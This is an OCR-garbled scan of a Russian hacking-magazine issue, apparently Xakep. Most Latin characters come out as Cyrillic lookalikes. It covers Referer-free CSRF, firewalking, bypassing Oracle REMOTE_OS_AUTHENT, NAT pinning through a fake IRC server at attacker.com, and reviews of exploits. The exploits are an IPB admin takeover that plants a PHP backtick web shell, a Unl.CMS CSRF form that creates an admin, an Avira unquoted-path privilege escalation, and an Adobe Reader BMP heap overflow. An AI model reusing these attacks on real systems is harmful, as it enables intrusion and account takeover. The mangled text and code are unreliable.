'<1прис суре=рЬ1ааеп паше=ета11 уа1ае=еха 
'<1прис суре=Ь1ааеп паше=разз уа1ле=раза 
'<1прис суре=Ь1ааеп паше=1оса1е уа1пще=еп 

: '</Еогм>'; 

10 сор.Егашез [0] .аосимшепс.рБоау.1ппехгНТМГ=розтаата; 

11 сор.Ехгамез [0] .аосишерт .десЕ1ещтепсВуТа ('аупЕРохт') .за тат ( 

12| } 

13 | </зскаре> 

14| </пеаа> 

15| <Боау оп1оаа="1оаа ()"> 


17| <1Ехгаше згс="аБопс:61апКк" 1а="погеЕегег">< 1Егатше> 


у Ведиез1{ Неадегз 
Поз ими. Е00Е1е.сот 
те{по9: РОЗТ 
гра: /1051п.рИр?10Е1п_а++етр+=1 
:зспете: ПЕфрз 
мегзюп: НТТР/1.1 
ассерЕ +ех+/Н+т1 , арр11са+1оп/хВ+т1+хт1 , арр11са*1оп/хт1;4=0.9,*/*;4=@.8 
ассер*-спагзеЕ м1пдом$-1251,и++-8;4=0.7,*;а=0.3 
ассер*-епсо4 ид: в21р,ае+1а{е, >асп 
ассер'-апдиаде: ги-ВУ,гиу;4=0.8, еп-1$;4=@0.6,еп;4=8.4 
саспе-согиго!: тах-аве=@ 
сомепепа/1И: 51 
сотеп!-4уре: арр11са1оп/х-илми-Фогт-иг1епсодеа 
сооке: 55=БОАААТЗАААВ1НА4_1\У00\К@71и\/У3ЗгуЕ101КЕ+тСХУРЕЭЗАМСИ627МН\УРу3+23+7+5х5\18е0о$а+ПаКкетк_Н76_04 
опа: НЕЕр://127.0.0.1:8081 | Е ' | ° 
изег-адепЕ Мо2111а/5.@ (\1паомз МТ 6.1; №064) Арр1емеьК1+/537.31 (КНТМЕ, 11ке беско) Спготе/26.0.141 
х-спгоге-уапаНопз: С011у0ЕТ1663А01с+$КВСКа2у0ЕТАтЬЗАО1р+КВСЬе2?у0ЕТ/оРКАО== 

у Сиегу $11т9д Рагатеегз 
ю9и_аНетрЕ 1 

у Рогт Оайа 
етай: ехатр1е@11\е.сот 


ме\ми зоугсе 


меми зоигсе леми ИР епсодед 


меми зоигсе ме\ми ЦВЕ епсодезд 


но без заголовка. Как это провернуть? Есть ряд различных 
методов, во многом браузерозависимых, но я приведу пару 
универсальных. 

Первый основывается на попытке повысить приватность 
в браузерах для НТТР$-соединений. Все браузеры, когда пользователь за- 
ходит на сайт по НТТР$, не передают заголовок Ветегег на другие сайты. 
В другую же сторону, с НТТР на НТТР5, заголовок есть. Таким образом, для 
проведения атаки нам надо поднять веб-сервер с НТТР$ и заманить на него 
жертву — запрос, посланный с него, будет чист. 

Второй способ основывается на том, откуда получаются данные для за- 
головка. Если не было исходного сайта, то и посылать нечего. Идея в своей 
основе прекрасна, работает во всех браузерах и нова. Легче всего понять ее 


будет по исходничку (доо.а/ВКхАу): 


<Ит1 > 

<Пеаа> 

<5сг1рф> 

ФипсЕ1оп 1оаа() { 

уаг роз{Чафа = '<+огт 14=аупРогт тефпод=РОЗТ += 
асЕ1оп=\ ' ИЕрз: / /ммм. \1с1т_зегуег. сот/1о021п.рир\'>' + 
'<1при фуре=И1А4еп пате=аааа \а1ие=Паскме />’ + 
</фогт>'; 
Фор. Егате$ [9] .аоситепт* .Боау .1ппегНТМЕ=ро5{Чдажа; 
Фор. {гате$з [9] .аоситеп*. ве*Е|1етепВута( 'аупЕогт'’). = 


Создаем фрейм, добавляем формочкус автоотправкой, и бац — запрос без Ве{егег 


зибт1{ (); 


} 


</$сг1ре> 


</Веаа> РЕ. 


<Бо4у оп1оа4="1оаа()"> 


<1+гате згс="абои* :Б]1апК" 14="поге+егег" >< /11гате> 


</Боау> 
</Вт1> 


В общем-то, тут, несмотря на объем кода, все просто. Самая главная 
фича способа — Нате с «абощ:ЫапК». Породив его, мы получаем возмож- 
ность избавиться от Ветегег нашего сайта. Далее же мы запускаем функ- 
цию |оаа, а она, в свою очередь, создает формочку (розааа) для генера- 
ции необходимого нам запроса. После эта формочка пихается все тем же 
Чама$сиргом в первый фрейм, который «абош:6апк», и эмулируется под- 
тверждение отправки данных. Все, данные отправились, а лишний для нас 
заголовок — нет. 


ОПРЕДЕЛИТЬ ПРАВИЛА ФИЛЬТРАЦИИ ФАЙРВОЛА 


РЕШЕНИЕ 

Данная задачка относится к теме сбора данных о цели и сегодня скрыва- 
ет за собой такую технику, как Нгема!Кто. Те, кто достаточно бородат, могут 
пропустить ее, остальных же прошу к столу :). 

Итак, представим, что мы желаем проникнуть из интернета в сеть 
какой-то организации. У нее есть некие серверы, которые доступны 
из инета, но есть и файрвол где-то между нами и серверами. Так вот, пра- 
вила фильтрации этого файрвола мы и можем определить, используя эту 
технику. Конечно, ЯгеммаКта, которую придумали когда-то давно М. Шиф- 
ман (М. ЗсИШтап) и Д. Голдсмит (0. СоазтиИ), может показаться трух- 
лявым пнем: и вендоры в теме, и админчики вроде тоже... Но так как эта 


бага относится к ряду п!5сопйдигаНоп, то и встречается она на практике 
систематически. 

Перейдем к делу. Для начала, чтобы понять эту технику, давай вспомним 
такое поле, как ТТЕ в заголовке 1Р-пакета. Вики говорит, что «значение ТТЁ 
может рассматриваться как верхняя граница времени существования 1Р- 
датаграммы в сети». В |Р-пакете данное поле уменьшается на 1 на каждом 
из узлов между источником и получателем. Оно необходимо для того, чтобы 
в сети не было пакетов, которые по тем или иным причинам вечно бы курси- 
ровали в ней. А как только ТТЕЁ становится равен 0, хост (на котором это про- 
изошло) должен отправить источнику 1Р-датаграммы 1СМР-пакет с типом 
«{СМР_ТМЕ_ЕХСЕЕБЕСО». 
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В общем-то, на основе этого работает программа {гасегоще (или тасет 
под \\Ит). Мы указываем некий хост, до которого хотим построить трейс, 
и посылаем пакет (УЧОР для первой и 1СМР для второй) со значением ТТИ, 
равным 1. И ближайший хост присылает нам сообщение 1СМР о том, что па- 
кет удален. Далее мы увеличиваем ТТЕ и еще раз отправляем пакет. Ситу- 
ация повторяется, и мы узнаем следующий узел на нашем пути. Таким вот 
образом мы доходим до нашей цели. Причем здесь важно отметить, что так 
как ТТЁЕ — часть 1Р-заголовка, то более высокий протокол мы можем исполь- 
зовать любой: и ЦОР и 1СМР и даже ТСР. Теперь же, помня все это, мы под- 
ходим к методике Ягема!Кто’а. 

Суть ее заключается в том, что на основе анализа ответов от файрвола 
с ТГ. у посылаемых пакетов больше, чем до файрвола, на 1, мы можем по- 
нять, какой порт по какому протоколу фильтруется, а какой нет. Сейчас по- 
ясню на примере. 

Методика состоит из двух шагов. Первым, ясное дело, надо определить 
месторасположение файрвола на трейсе. Для этого мы можем использо- 
вать любой метод трейса. Итогом будем некое значение ТТЕ до файрвола. 

Второе — это само сканирование файрвола. Предположим, мы по- 
шлем какой-то ТСР-пакет на хост за файрволом, но ТТЁ будет равен ТТ 
до него. Тогда нам файрвол ответит, что время жизни пакета исчерпано. 
А если же мы пошлем на единицу больше, то есть на один хост за файр- 
вол? Тогда сработает магия. Если данный ТСР-порт фильтруется файр- 
волом, тогда он ответит нам молчанием. Если же не фильтруется, то нам 
тогда придет сообщение «!СМР_Т1МЕ_ЕХСЕЕШЕО», но уже от узла, сле- 
дующего за файрволом. Данный узел принято в контексте ЯгемаКто’а 
называть таис. 

Таким образом, если фильтруется — мы не видим ответа на свой ТСР- 
запрос, аесли не фильтруется, то мы видим 1СМР-пакет в ответ. Ну и какуже 
было сказано, используя данную логику, мы можем определить правила 
фильтрации на файрволе как по ТСР-, так и по ЧОР-протоколу. 

Что еще приятно — мы можем определить правила на нескольких файр- 
волах. Для этого нужно сделать все то же самое, но метрикой выставить хост 
за вторым файрволом. 

Теперь поговорим об основных проблемах. Во-первых, исходящие 1СМР 
в правильной конфигурации должны фильтроваться файрволом. Это-то и яв- 
ляется той мисконфигурацией, которая позволяет нам его анализировать. 
Во-вторых, есть некие более умные девайсы, которые знают расстояние 
до итоговой цели, а потому, если ТТЁЕ меньше необходимого, отбраковывают 
пакеты. Кроме того, общее ограничение — нам надо знать внешний 1Р хоста 
за файрволом, то есть МАТ не даст возможности заюзать данную технику. 
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Конечно, ограничения эти достаточно суровы, но, с другой стороны, вну- 
три корпоративной сети (из одного сегмента атака на другой) многие из них 
уже не будут действовать, что даст нам возможность для Ягема!Кто?’а. 

Реализовать сами атаки можно либо с помощью тулзы Ягемиа(К (есть в ВТ, 
Кай), либо используя МЗЕ-скрипт ЯгемаК в Мтар’е. 


ОБОЙТИ АУТЕНТИФИКАЦИЮ В СУБД ОВАСЕЕ 


РЕШЕНИЕ 

Должен признаться, что я не большой знаток СУБД Огасе. Наверное, весь 
мой опыт работы с нею заключается в различных методах ломания ее :). Так 
что уж заранее простите за возможные терминологические и другие косяки. 
Хотя на саму суть задачи это повлиять не должно. 

Огасе ОВ — тотеще старичок. В ней есть много всяких олдскульных штук. 
Которые, какни странно, до сих пор еще активно используются. Одна изних — 
параметр ВЕМОТЕ_ О$_АЧТНЕМТ. Одно из почти официальных описаний го- 
ворит о нем следующее: «Параметр инициализации РЕМОТЕ_О$_АЧТНЕМТ 
предоставляет доверительную модель сетевой аутентификации, пользовате- 
ли, имеющие учетные записи операционной системы, могут получать доступ 
к базе данных. Таким образом, вся ответственность аутентификации ложится 
на операционную систему». Сильно упрощая, можно сказать, что с данным 
параметром ответственность за аутентификацию под пользователями пере- 
кладывается на плечи ОС. Казалось бы, что в этом такого? Типа если у тебя 
есть пароль на учетку в ОС с СУБД, то и ОК, логинься по ней в СУБД — все 
вполне безопасно. Особенно если пароль от учетки в ОС не сливать, то, пока 
хакер ОС не ломает, доступа у него не будет. 

Все это так, да не совсем. Проблема в том, что это распространяется 
и на удаленную аутентификацию в СУБД. Но сначала поясню сам процесс ау- 
тентификации с РЕМОТЕ_О$_АЧТНЕМТ. 

Когда мы локально подключаемся, фактически наш клиент не посылает 
логин или пароль, а просто отправляет имя пользователя из ОС. И ОгасЕ ве- 
рит этому. Но, как я выше сказал, ничего не стоит подключиться к ТМ№$-порту 
удаленно и отправить необходимое имя пользователя. 

То есть, утрируя, когда мы подключаемся, можно сказать, мы говорим 
следующее: «Моя ОС подтверждает, что я супер-пупер-админ». А оракл та- 


КОЙ: «Ну, если твоя ОС говорит, то я верю!» Согласись, невероятная техно- 
логия :). 

Если тебе кажется, что это — «отсталость», которую уже никто не исполь- 
зует на продакшне, то я попробую тебя разубедить: многие крупные биз- 
нес-приложения работают именно с включенным РЕМОТЕ_О$_АЧТНЕМТ. Да 
и в интернете можно найти мануалы по включению и успешному использо- 
ванию данной фичи. Конечно, есть всякие костыли, чтобы закрыть эту неимо- 
верную дыру, типа сегментации, чтобы не было доступа до СУБД, или опре- 
деления списка хостов, с которых разрешено подключение к СУБД. Но это же 
надо все внедрить, да еще и так, чтобы мы не обошли :). 

И в качестве примера последовательность для обхода аутентификации 
при подключении к СУБД, которая обслуживает какую-нибудь ЗАР-систему: 
1. Узнается ЗО сапа (сделать это очень просто, так как инфа не секретная). 
2. Создается в ОС пользователя с именем 5аат. 

3. Запускается под новосозданным пользователем команду 


5а1р1из /@(РЕЗСВТРТТОМ=(АБОВЕ$$ _ЕТ$Т= (АБОВЕ$$= (РКОТОСО! =‹ + 
ТСР) (НО$Т=Огас1е_ТР) (РОВТ=Т№5_рог®)) ) (СОММЕСТ_РАТА=«= 
($10=$АР_510))) 


где ОгаФе 1Р — адрес СУБД Огасе; ТМ$_рой — порт ТМ$ ПЗепега; 
ЗАР_$0 — $10 ЗАР’а. 


Все. Невероятно, но факт — доступ в базу данных полученг Таким обра- 
зом, для обхода этого вида аутентификации требуется только лишь знать имя 
пользователя. А с учетом того, что эта инфа передается в открытом виде, то с 
помощью МИ М-атаки злоумышленник ее сможет выкрасть. 
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ПРОБИТЬСЯ ЗА МАТ 


РЕШЕНИЕ 

Продолжая тему про сетевые штуки, давай вспомним про такую интересную 
технику, как МАТ ртпта. С помощью ее мы имеем возможность проникнуть 
из внешней сети за сетевой девайс, организующий МАТ, и попытаться под- 
ключиться к одному из узлов в МАГ’е. 

Для галочки немного теории. МАТ — пемогк адаге$$ {гапЗ1айоп — «это 
механизм в сетях ТСРЛР, позволяющий преобразовывать 1Р-адреса тран- 
зитных пакетов». Например, сейчас у многих стоит дома \М/!-Н и организова- 
на локальная сеть, при этом внешний ПР-адрес один, и выдан он внешнему 
интерфейсу \\\-Е1. Но хосты из твоей сети могут ползать по инету. Как? Как 
раз МАТ помогает. Когда ты заходишь на какой-то сайт, твои данные прохо- 
дят через твой роутер. Он уже, в свою очередь, подменяет в пакетах, пере- 
даваемых тобой, исходящий [Р на свой внешний ГР, атакже указывает другой 
исходящий порт. Соотношение между твоим 1Р и твоим портом сопоставля- 
ется с внешним портом \М/-Е!-роутера и хранится вайфаем. Таким образом, 
ответные пакеты от сайта, на который ты заходишь, придут уже твоему \М/- 
Е-роутеру, и он, сделав обратную трансляцию из своего порта в твой 1Р и 
твой порт, сможет передать тебе данные от сайта. 

Плюсы МАГ’а легко заметны: очень удобно и дешево. Экономит заканчи- 
вающиеся 1Р\4-адреса. Скрывает хосты, находящие за МАГ’ом, от прямых 
подключений извне. Последний факт мы и постараемся победить. 

Итак, МАТ ршпто. Автор техники — Сэми Кэмкар (Зату КаткКаг — автор 
Музрасе-червя Зату), и, наверное, потому техника находится на стыке тех- 
нологий и юзаются веб-штуки. Хотя сначала, вероятно, стоит обратиться к 
одному минусу МАТ’а. Он заключается в том, что есть целый ряд олдскульных 
протоколов, которые требуют для своей работы использования двух под- 
ключений. Если проще, то и отнас к серверу, и от сервера к нам. Примером 
может быть ЕТР (отдельно поток для команд, отдельно для данных) или 1ВС. 
То есть клиент может подключиться к серверу, а вот сервер обратно уже нет 
(если соответственная трансляция не настроена вручную). Для того чтобы 
бороться с таким проблемами, есть разные методы, и один из них — дина- 
мическая трансляция обратных подключений. Эта фишка есть у некоторых 
более продвинутых сетевых девайсов (в том числе \\!-Е!-роутеров). Они 
контролируют трафик, и если видят определенный протокол и команды в 
нем, по которым нужно обратное подключение к хосту в МАТ, то они авто- 
матически создают правила трансляции в обратную сторону. Таким обра- 
зом, серверная сторона уже сможет подключиться к хосту в МАГ’е. 

Иметь такой умный девайс, конечно, хорошо. Вот только он порождает 
для нас как для атакующих возможность добраться до хостов, находящихся 
за этим умняшкой. И вот теперь последовательность от Сэми, которая по- 
зволит нам это провернуть: 


Егот 10.0.0.1:2132 
То 5.6.7.8:80 


МАТ 
4.3.2.1 


Спепт 


Егот 5.6.7.8:80 
То 10.0.0.1:2132 
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Заманиваем нашу жертву на наш сайт (ПЕр://аКаскег.сот). 

На нашем сайте мы размешаем скрытую формочку, которая будет под- 

ключаться к нашему же поддельному 1АС-серверу (ПЁр://аКаскег. 

сот:6667). 

3. При входе на наш сайт браузер жертвы автоматически сабмитит формоч- 

ку. Таким образом браузер как бы подключается к нашему поддельному 

|ВС-серверу. 

Наш 1АС-сервак должен делать ничего :), просто слушать порт. 

В формочке на нашем сайте также должно быть скрытое поле, в котором 

будет примерно следующее значение «РРАММ$С зату :\10СС СНАТ зату 

Пр ш аесита| [ро ]\1\п», где Пр т аесита|] — 1Р-адрес, с которого мы 

будем подключаться к нашей жертве, и [роп] — это порт, к которому мы 

хотим получить доступ у жертвы. При сабмите формы эти данные будут 

отправлены на наш поддельный !1АС-сервер. 

6. Далее присмотримся к умному \М/-Е!-роутеру нашей жертвы. Он увидит, 
что жертва подключается на 1ВС-сервер где-то в инете, а кроме того, еще 
и инициализирует попытку ОСС-чата. А ОСС, какты, наверное, уже понял, 
требует, чтобы удаленный хост подключался к клиенту (то есть к нашей 
жертве). 

7. Основываясь на своей умности, он думает, что коли жертва хочет с кем-то 

початиться в Сети, то почему бы ей не помочь в этом. И создает времен- 

ное правило, пробрасывающее с внешнего 'Р-роутера с порта, указанного 

в настройках для чата — [ро\], данные на внутренний (МАТ) 1Р жертвы на 

тот же порт — [ро\]. 


№ — 


О 


Та-дам! Мы имеем доступ! По сути, мы можем проводить атаки на любой 
порт у жертвы, на любой протокол. Очень круто. Так что и за МАТ’ом — не 
как за каменной стеной. Кстати, попробовать метод можно на сайте Сэми — 
а00.91/7ЬНПО, кроме того, аналогичный модуль должен быть в фреймворке 
ВеЕР. 

Далее немного о минусах метода. Как было сказано, техника эта основа- 
на именно на умности МАТ-девайса, и нам необходимо, чтобы девайс жерт- 
вы был таким. В своем примере Сэми провернул это дело на ВеКт М1 \М!зюп 
\Мгее5$ Вощег, а вот мой О-ШпкК оказался не так умен. Так что я ошущаю 
себя в полной безопасности :). 

На этой приятной ноте прекращаю сегодняшний поток мыслей. Наде- 
юсь, что было интересно :). Если есть пожелания по разделу Еазу Наск или 
просто желание поресерчить — пиши мне на ящик адигг4од@атан.сот. 
Всегда рад :). 

И успешных познаний нового! = 


Егот 4.3.2.1:14387 
То 5.6.7.8:80 


У\УАВММС 


Вся информация предо- 
ставлена исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут от- 
ветственности залюбой 
возможный вред, при- 
чиненный материалами 
данной статьи. 


Егот 5.6.7.8:80 
То 4.3.2.1:14387 


Простейший примертого, как работает МАТ 
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У\УАВММС 


Вся информация предо- 
ставлена исключительно 
в ознакомительных целях. 
Ни редакция, ни автор не несут 
ответственности за любой воз- 
можный вред, причиненный 
материалами данной статьи. 


Наверное, ты ожидал новую уязви- 
мость в Чама? Но увы, на счетчике 
сайта |ауа-Одау.сот горит месяц от- 
сутствия новых уязвимостей нулевого 
дня... Зато нас ждет подробное опи- 
сание одной из свежих уязвимостей 

в старом добром АаоВе ВНеааег. 
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Борис Рютин, ЦОР (Езаде [аБ) 
дикебагтап@хакер.ги, 
@дикерагтап 


ЭКСПЛОЙТОВ 


АНАЛИЗ СВЕЖЕНЬКИХ УЯЗВИМОСТЕЙ 


|РВ (ММ ОМ РОМЕК ВОАВО) ВСЕ ВЕРСИИ — 
ОТ ЗАХВАТА ПРАВ АДМИНА ДО ВЫПОЛНЕНИЯ 
ПРОИЗВОЛЬНОГО КОДА 


Дата релиза: 13 мая 2013 года 
Автор: опт УЧЕАМ 
СУЕ: М/А 


Начнем сегодняшний обзор с необычной веб-уязвимости — перехвата прав 
любого пользователя в популярном форумном движке1РВ. 

В функции проверки почты пользователя используется удаление пробе- 
лов. Пример кода из файла аатт/зоигсе/базе/соге.рйр: 


${аЕ1с ричб11с Фипс1оп сИескЕта11Адаге$$(_$ета11 = "") { 
$ета11 = +г1т($ета11); 
$ета11 = $&г_герТасе( 


и и 


"", $ета11 ); 


Как ты можешь знать, {ит удаляет пробелы (и некоторые другие симво- 
лы) до и после строки, поэтому разработчики 1РВ дополнительно используют 
г герасе, чтобы удалить пробелы в почте. И далее в функции юа4 для за- 
грузки информации о пользователе в файле аатт/зоигсе/базе/лр$Метрег. 
рИр в качестве 1 пользователя использует его етап: 


сазе 'ета11': 
1+ ( 15$_аггау(_ $тетЬьег_Кеу ) ) 
аггау_ма1К(_$тетбег_Кеу, сгеафе_ФипсЕ1оп(' &$м,$К', = 
'$у="\'".1рзКеё1$гу: :ОВ()->а@а$1азПе$+= 
( эЕгфо1омег( $уи ) ).“"\'"; ')); 
$ти11р1е_14$ = темвей. Ку: 

| 


е1 хе 


иги 


фтетбег_\ма1ие = . 1ръКеё1$Егу::ОВ() ->+= 
а99$1аНез (_$%г{о1омег( $тетбег_кеу ) ). """; 


$фтетбег_#йе1 = 'ета11'; 

Как видно, никакой проверки длины переменных $тетрег Кеу и $\ нет, 
поэтому можно передать етай с ложными пробелами. Теперь рассмотрим 
эксплойТ. 


ЕХРЕОТ 
Первым делом ищем ета! администратора, его можно получить различными 
способами: 

воспользоваться мПо!5 для домена, на котором установлен форум; 
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. проверить предполагаемый ета! в различных социальных сетях; 
. использовать СОгаматаг; 
._ использовать СИ или Х$$ на других сайтах. 


После того как мы получим етай, создаем своего пользователя с ложным 
ящиком. Так как размер переменной в БД равен 150 символам (\агспаг(150)), 
нам нужно передать: 

‚ ета!; 
. оставшееся количество пробелов до 150; 
. несколько любых символов, чтобы пройти АЧАХ-валидацию. 


Пример: 


Реальный ета11 администратора: 'адт1п@адт1п . сот" | 
Атакующий ета1]: 'аЧт1п@а@дт1 п. сот «много пробелов> АААА' 
Для передачи етай также можно воспользоваться программой Вигр Зице 
либо любым другим манипулятором НТТР-запросов. 

Теперь проходим в свой профиль и меняем пароль на любой, а система, 
в свою очередь, поменяет у того, кого выберет команда ЗЕТЕСТ, то есть у ад- 
министратора. Далее можно залить небольшой бэкдор, идем в редактирова- 
ние шаблонов /аатт/паех.рИр?аа$е$$=О000&арр=соге&тодше=етр!ае$$ 
юп=етра{е$&4ао=1$18&е10=1 и добавляем в аетаи Неааег следующий код: 


<рНр> 
1+(155е*($_КЕОЧЕ$Т[' рипа ' ])) 
{ 
$рипд=$_ВЕОЧЕЗТ [ "рипа' ]; 
есйо “"$рипа'; 


} 
</рйр> 

Теги <рИр> и </рйр> используются шаблонизатором [РВ для вставки РНР- 
кода, а символы " — для выполнения системных вызовов. Протестируем: 


1паех .рИр?рипд=1$%20/ 
И получим: 


61п Бооф Би114 аеу ес Поте 1п1%г49.1т5 1п1%г4.1т.о1а 116 
10${+Роуипа мед1а мп попех1$еп ор ргос гооф гип $61п 
5е11пих зг\у зуз тр изг маг ут11пий ут11пи7.о1а 


ТАВСЕТ$ 
|РВ <= 3.4.4. 


$ОШУТОМ 

Доступно обновление с исправлением данной ошибки от производителя. 
Правда, на просторах интернета можно встретить несколько версий для оз- 
накомления, поэтому администраторы могут воспользоваться патчем от ав- 


тора уязвимости (01.1у/12059). 


тевым | ТО | ма || 
вй | о т: В. 


оо Мое: 


= 
Ве 
Е} и ВАБЕН По ране к ФИГАВЫ 


ор И у Зр деыеИ рТЕГ ярст 
Е авы р аа 


ИИ АЕ НИНЕ Рори 


Пример работы эксплойтав Амта Регзопа! 
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УМТ.СМ$ 2.9 — УЯЗВИМОСТЬ ТИПА С5ВЕ 


С\$$у2: 5.1 (А/:М/АС:Н/Аи:М/С:Р/:Р/А:Р) 
Дата релиза: 8 мая 2013 года 

Автор: Ноп-Тесй Впаде ЗА 

СУЕ: 2013-2754 


Так же как это было с 5! -инъекциями, после официального объявления но- 
вого типа уязвимостей СЗЪНЕ такой вид стали находить в различных продуктах 
и сервисах. В этот раз под прицел исследователей попала Чп!.СМ$, которая 
позиционируется как конкурент популярной СМ$ 1С-Битрикс. 

Уязвимость позволяет выполнить определенные действия в системе с по- 
мощью НТТР-запроса без проверки, откуда он поступил. 


ЕХРЕОТ 
Для эксплуатации создается веб-страница, на которую необходимо перена- 
прави администратора: 


<ФРогт ас 1оп=" Ир: / / [По$* ] /аат1п/изег$/ада/изег/4о/" += 

теЕпод="ро${" пате="та1п" > 
<1приЕ фуре="И1а4еп" пате=" даа [пем] [1051п]" += 
уа1че="сзгРизег" > 
<1приф фуре="п1адеп 
уа1че="раз5мога" > 
<1при* фуре="И1а4еп" пате=" даа [пем] [е-та11]" «= 
уа1че="изег@та11 .сот"> 
<1при* фуре="р194еп" пате="дафа[пем] [15_ас*1уаеа]" += 
уа1че="1"> 
<1при{ фуре="п1адеп 
уа1че="изегпате" > 
<1при* фуре="П1а4еп 
уа1ие="1"> 
<1при{ фуре="п1адеп 
уа1иче=" 2" > 
<1при{ фуре="п1а4еп" пате="" уа1иче=""> 
<1при* фуре=" зибт1" 19="6 п" > 

</Фогт> 

<$сг1рф> 
аоситеп{ .та1п.зибтт*(); 

</5сг1рф> 


и 


пате=" Дафа [пем ] [раз5мога ] [ ]" «= 


и 


пате="да*а[пем] [ Тпате ] 


и 


пате="афа[пем] [ггоир$][ ]" «= 


Ш 


пате="4аа[пем] [вгоир$][]" == 


В результате в системе будет создан новый администратор с именем 
сзТизеги паролем раз$\мога. 


ТАВСЕТЗ 
ОМ.СМ$ <= 2.9. 


ЗОШИТЮМ 


Доступно обновление сисправлением данной ошибки отпроизводителя. 


ПОВЫШЕНИЕ ПРИВИЛЕГИЙ В АМВА 
РЕВЗОМАЕ 


Дата релиза: 15 мая 2013 года 
Автор: АкаЗер 
СУЕ: М/А 


Уязвимость существует из-за неправильного вызова функции СтежеРгосе$з$. 
Если мы посмотрим описание в М$ОМ (Би.1у/1ЗЕТ8СМ), то увидим, что если 
не добавить кавычки в имена путей, имеющие пробелы, то получим на выходе 
подобные вызовы: 


: \ргоггат.ехе #1ез\зи6 41г\ргоёгат пате 
:\ргоггам #Я1ез\5ибБ.ехе 41г\ргоёгат пате 
: \ ргоёгам #1ез\зи6 41г\ргоёгат.ехе пате 
: \ ргоёгам #1е5\зи6 41г\рговгат пате.ехе 


обсоо 


Тоестьнам достаточно создать файл сименем Ргодгат.ехе в корне систем- 
ной директории, и Амга запуститего с правами МТ_АЧТНОНПУ/ЗУЗТЕМ. 


ЕХРЕОТ 
Для эксплуатирования уязвимости воспользуемся возможностями АщоТ 
искомпилируем код какехе-файл: 
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иб11е 1 
51еер(18000); 
// Показывает права, с которыми запустилось окно 
М=Вох(64, "", "В1ай!" & @СКЕЕ & "Моо{: Ме вот=> " @& = 
@У5егМате); 

_ // Запуск сма.ехе 

__ $5Ие11Ехеси*е ("ста .ехе"); 

ИЕпа 


Результат выполнения после перезагрузки системы можно увидеть 
наскриншоте. 


ТАВСЕТЗ 

Продукты Амта: 

. Ргодусуегзоп 10.2.0.719 25.10.2012; 

‚ Эеагсп епаше 8.02.12.38 07.05.2013; 

‚ \Мги5 аеНпНюп НЕ 7.11.77.54 08.05.2013; 
. СоптоСещег 10.00.12.31 21.07.2011; 

‚ СопЯа Сещег 10.00.13.20 21.07.2011; 

‚ Щке РИемаКег 10.03.00.07 21.07.2011; 

. АпМг Сага 10.00.01.59 21.07.2011; 

. РКег10.00.26.09 21.07.2011; 

. Апи\Мг\МебСоага 10.01.09.00 09.05.2011; 
. оспедшег 10.00.00.21 21.04.2011; 

. Орамег 10.00.00.39 21.07.2011. 


ЗОШТЮМ 


На момент подготовки статьи патча не было. 


АБОВЕ ВЕАБЕВ ВМРИКЕ — 
ПОВРЕЖДЕНИЕ КУЧИ 


Дата релиза: 14 мая 2013 года 
Автор: гейагл 
СУЕ: 2013-2729 


Ошибка проявляется при парсинге ВМР-файла, который был сжат с помо- 
щью алгоритма НЕЕЗ. Для воспроизведения уязвимости нам нужно встроить 
это изображение в интерактивную форму РОЕ-документа. Обработкой ХРА- 
формыиВМР-файлазанимается плагин АсгоГогт.ар!. Дляначаларассмотрим 
ХРГА-код. 

РОЕ-файлы могутсодержать дватипа форм: 
‚ стандартные — Гопт$ Баа Гогптаф{ (ЕПЕ ог АсгоРГопт5); 
‚ основанные на ХМЕ — ХМЕ Еоит$ АгсПйестиге (ХРА). 


Впервые ХГА-формы были добавлены в версию 8.1 Адоре Веааег, и хроно- 
логию их версий можно увидеть в таблице. Как ты уже понял из названия, ХРА 
основывается на шаблонной системе и использует простую грамматику. При- 
мер простейшей формы, содержащей изображение: 


<фетр1афе хт1п$ : хРа=" Ир: / /ммм. ха .ог8/зспета/+= 
хфа-+етр1а%е/3.1/"> 
<5ибфогт пате="Фогт1" 1ауоцч{="{6" ]оса1е="еп_15" «= 
гефоге5афе="аифо" > 
<разеъе*> 
<равеАгеа пате="Раёе1" 14="Раде1" > 
<сопфепеАгеа х="0.251п" у="0.251п" м="576ре" «= 
и="756р*"/> 
<тедтит зфоск="аефаи1*" $зПоге="612ре" += 
1опв="792рЕ" /> 
</разеАгеа> 
</раве5еф> 
<зибфогт м="576ре" И="756ре"> 
<йе]4 пате="ТтазеЕ1е1 а" › 
<и1> 
<1тавеЕд1{ адафа="етбеа" /> 
</ч1> 
<уа1ие> 
<1таёе> ААААА.. АААААА‹< /1таде> 
</ма1ие> 
</Не1а> 
</зибРогт> 
__ <«/5иб6Фогм» 
</етр1а*е> 
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ХГА-форма может быть встроена в пустой РОЕ-поток и воспроизведена 
всеми последними версиями Адоре Веааег. Если мы рассмотрим РОЕ-файл 
поближе, то он должен будет содержать следующие поля: /Мееа$Репаеппда, 
/Ежепзюп$ и /АсгоГопт. То есть наш файл будетвыглядеть примернотак: 


3 0 05] 
<< /тепёЕП 12345 >> 
$Егеат 
АРА а ага 
епазгеат 
2 0 05} 
епао6} 
10 05} 
<< /Туре /Сафа1ов 
/Мееа$Кепаег1па {гие 
/{АсгоЕогт 2 0 В 
/Ехеп$10п$ << 
/АОВЕ << 
/{Вазе\ег$1оп /1.7 
/{Ехеп51топЁеуе]1 3 
>> 
>> 


>> 
епаоБ) 


Далее рассмотрим сам багв формате ВМР Этот формат может сжиматься 
в двух режимах: «чистом» (как есть, то есть без сжатия) и через алгоритм ВЕЕ 
(Вип Гепай Епсодта, кодирование длин серий или кодирование повторов). 
Сам механизм сжатия довольно прост, второй байт — это пиксель, а первый 
байт — количество его повторов. Если количество байт равно нулю, то второй 
байтбудет специальным — ЕОЁ или разница (аеКа). 

В«чистом»режимевторойбайтсодержитколичествобайтов, которыебудут 
скопированы буквально. Каждый проход в таком режиме должен быть выров- 
ненпогранице слов, то есть мы должны заполнить дополнительными байтами, 
которые не входят в это число. После прохода в таком режиме продолжается 
АЕЕ-сжатие. 

Таблицас указанием специальныхбайтов: 


Второй байт Значение 

0 Конец строки 

Е Конец 61{тар 

2 Разница (ае1{а). Следующие два байта — 


это горизонтальное и вертикальное смещение 
от текущей позиции до следующего пикселя 
ВЕР 5 Переключение в «чистый» режим 
Теперьрассмотримуязвимую функцию, которая отвечает заобработку ВЕЕ 
ВМР инаходится в АсгоРогт.ари. Ниже представлен псевдокод после декомпи- 
ляции этого файла: 


спаг* г1е(ЕТЕЕ* $%геат, ип$1епе4 Ие12И®, ип$1епед мтаеН){ 
азъег* (Не1епЕ < 4096 && Пе1ейе < 49096); 


